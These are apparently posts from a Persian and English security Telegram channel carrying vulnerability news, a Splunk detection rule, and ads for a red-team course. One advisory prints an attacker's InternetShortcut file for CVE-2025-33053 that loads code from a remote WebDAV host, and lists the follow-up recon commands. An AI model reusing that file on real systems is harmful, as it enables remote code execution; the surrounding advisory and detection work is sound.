SoheilSec – Telegram
You have got a valid NTLM relay but SMB and LDAP are signed, LDAPS has got Channel Binding and ESC8 is not available... What about WinRMS ?
Don't forget to patch your WinRMS' configurations if you enabled the default one!!
Blog:https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Tool:https://github.com/fortra/impacket/pull/1947
🆒2
🗿71👍1
At this week’s Microsoft BlueHat IL conference, Benjamin Delpy - widely respected for his work with Mimikatz - delivered what appears to be the first industry leak of Mimikatz 3.0.0 in a live demo. For those of us who have used Mimikatz extensively, this update is particularly intriguing. Delpy made it clear from the outset that this version won’t be publicly released anytime soon - a move that suggests significant shifts ahead.
🤔6👍2
Cloak and Firewall: Exposing Netsh’s Hidden Command Tricks

https://www.splunk.com/en_us/blog/security/netsh-firewall-evasion-techniques.html
با سلام و وقت بخیر،
ضمن عرض تسلیت به مردم ایران
در صورتی که در حوزه SOC فعالیت می کنید حتما آسیب پذیری CVE-2025-33073 را زیر نظر داشته باشید امکان دامپ پسورد با سطح دسترسی یوزر پایین در صورتی که dns بتواند ادد شود و smb signing خاموش باشد.
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
نمونه لاگ عکسش ضمیمه شد همچنین در صورتی که ادمین سرور هستید می توانید با کامند چک کنید
Get-DnsServerResourceRecord -ZoneName "domain.corp" | Where-Object { $_.HostName -like "*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA*" }
14👌6👍4🤔2🙏2
با سلام و وقت بخیر،
یکی از آسیب‌پذیری‌های جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیب‌پذیری CVE-2025-33053 می‌باشد. این آسیب‌پذیری از طریق استفاده از فایل‌های .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم می‌کند.
به‌طور خاص، مهاجم فایلی با محتوای زیر ایجاد می‌کند:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش می‌کند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث می‌شود تا امکان اجرای کد مخرب از راه دور فراهم شود.
14
طبق گزارش Check Point، یک گروه APT با استفاده از این روش بدافزار خود را اجرا کرده و کنترل سیستم را به دست گرفته‌اند. شواهد نشان می‌دهد C2 مورد استفاده یکی از اجنت‌های Mythic بوده و دستورات زیر توسط آن اجرا شده‌اند:
ipconfig.exe /all
netsh.exe in tcp show global
netsh.exe advfirewall firewall show rule name=all verbose
route.exe print

یک رول پایه برای شناسایی url
index=sysmon EventCode=1 
(Image="*iediagcmd.exe" OR CommandLine="*iediagcmd.exe*")
AND (CommandLine="*@ssl@443*" OR CommandLine="*DavWWWRoot*" OR CommandLine="*summerartcamp*")

و اما poc آسیب پذیری:
https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept
9🗿1
Fortinet Fixes Critical SQL Injection Flaw in FortiWeb (CVE-2025-25257, CVSS 9.6)

https://securityonline.info/fortinet-fixes-critical-sql-injection-flaw-in-fortiweb-cve-2025-25257-cvss-9-6/
3😈1
RTO.pdf
96.2 KB
دوره RTO
شروع دوره 17 مرداد مدت زمان دوره در 4 جلسه 8 ساعته که کلا 32 ساعت روزهای برگزاری جمعه ها 8 تا 16
دوره به صورت آنلاین می‌باشد. در صورتی که سرفصل تکمیل نشود تایم اضافه خواهد شد.
دوره به صورت عملی با سناریو شبیه سازی APT بر روی LAB شخصی سازی شده می‌باشد.
سرفصل ضمیمه شد هر روز شامل چندین موضوع می‌باشد که همراه با حل تمرین در لب می‌باشد.
قیمت دوره 15 تومن
نمونه تدریس
https://www.youtube.com/@soheilsec/playlists

سوال در مورد دوره @soheilsec
23🗿3👌2🤔1🆒1
FULLY OPERATIONAL: STUXNET 15 YEARS LATER AND THE EVOLUTION OF CYBER THREATS TO CRITICAL INFRASTRUCTURE.

https://homeland.house.gov/hearing/fully-operational-stuxnet-15-years-later-and-the-evolution-of-cyber-threats-to-critical-infrastructure/
3
Forwarded from Try Hack Box
💻 به تیم مدرسان TryHackBox بپیوندید!

تیم TryHackBox در حال گسترش تیم مدرسان خود است و از متخصصان حوزه امنیت سایبری، تست نفوذ، تیم قرمز (Red Team) و تیم دفاعی (Blue Team) دعوت می‌کند تا به ما بپیوندند.

اگر شما تجربه عملی و تخصص در یکی از حوزه‌های امنیت سایبری دارید و علاقه‌مند به انتقال دانش و تجربیات خود به دیگران هستید.

همچنین اگر می‌خواهید در یک جامعه آموزشی پویا و حرفه‌ای فعالیت کنید، ما فرصتی ایده‌آل برای شما داریم

در کنارتان هستیم تا دوره‌های آموزشی خود را طراحی و تدریس کنید و از حمایت تیم ما برای تولید محتوای باکیفیت بهره‌مند شوید.

همچنین درآمدی متناسب با مهارت‌های خود داشته باشید و در رشد جامعه امنیت سایبری نقش مؤثری ایفا کنید.

درصورت تمایل رزومه خود را برای ما ارسال کنید.

Telegram: @TryHackBoxBot
Gmail: TryHackBox@gmail.com
3
SoheilSec
RTO.pdf
سلام دوستانی که هنوز ثبت نام نکردند تا تاریخ 10 مرداد می‌باشد.
3